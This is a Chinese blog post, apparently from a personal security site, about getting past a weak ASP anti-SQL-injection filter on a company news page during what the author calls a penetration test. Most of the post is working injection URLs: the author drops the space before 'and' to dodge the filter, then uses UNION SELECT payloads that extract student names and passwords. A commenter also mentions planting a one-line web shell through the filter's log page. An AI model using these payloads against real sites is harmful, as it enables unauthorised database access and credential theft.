绕过垃圾防注入系统

今天在帮一个站做渗透测试的时候,旁注找到个asp企业站,asp好拿嘛,所以还是非常开心的,其中一个asp站,有这样的链接:

http://www.xxx.cn/news_list.asp?news_id=1165

目测一般都有漏洞,加个单引号看看,啪地弹出一个框,尿都吓出来了

现在好多的ASP网站由于都存在注入等问题,于是都装备了这种先进的注入系统,所以你一般看到有反注入系统的站后面都是存在注入漏洞的,能bypass反注入就搞定了,不过一般这些反注入系统都很垃圾,很多没有过滤cookie注入,或者随便改下注入语句就能绕过了,下面的烂大街语句肯定都被拦截了。

http://www.xxx.cn/news_list.asp?news_id=1165 and 1=1

http://www.xxx.cn/news_list.asp?news_id=1165 and 1=2

http://www.xxx.cn/news_list.asp?news_id=1165 and 666=666

让我感到震撼的是,居然order by 没有拦截,完全是一个没有节操的防注入系统啊,用order by确定了字段数是9,过滤了and,采用编码绕过也没有成功,试了几次,我发现它过滤的特征是”空格+and“,那么我们索性不要空格了,直接这样写:

http://www.xxx.cn/news_list.asp?news_id=1165and 1=1

http://www.xxx.cn/news_list.asp?news_id=1165and 1=2

嘿嘿嘿,sb了吧,成功绕过了,网上说的绕过技巧很多,可是好像没有提过这种方法,虽然绕过了可惜猜不出管理员表,只猜出了用户表,union一下,还是可以查出来的。

http://www.xxx.cn/news_list.asp?news_id=1165and 1=2 union select 1,2,3,4,5,6,7,8,9 from student

http://www.xxx.cn/news_list.asp?news_id=1165and 1=2 union select 1,2,student_name,4,5,6,student_password,8,9 from student

对它的库也没兴趣,纯属练手而已,完。

本文标题:绕过垃圾防注入系统
本文链接:https://www.nigesb.com/bypass-asp-anti-injection.html
订阅本站:http://www.nigesb.com/feed
转载请注明来源,如果喜欢本站可以Feed订阅本站。

发表评论?

4 条评论。

  1. 还以为是之前很早的通用防注入系统,直接找到记录非法注入的ASP界面 直接注入个一句话。才到连之!只不过http://www.xxx.cn/news_list.asp?news_id=1165and 1=1
    这种方法头次看到~不错!

  2. 请教楼主,怎么可以通过order by 语句查询到字段数,这个sql应该怎么构造呢

发表评论


注意 - 你可以用以下 HTML tags and attributes:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>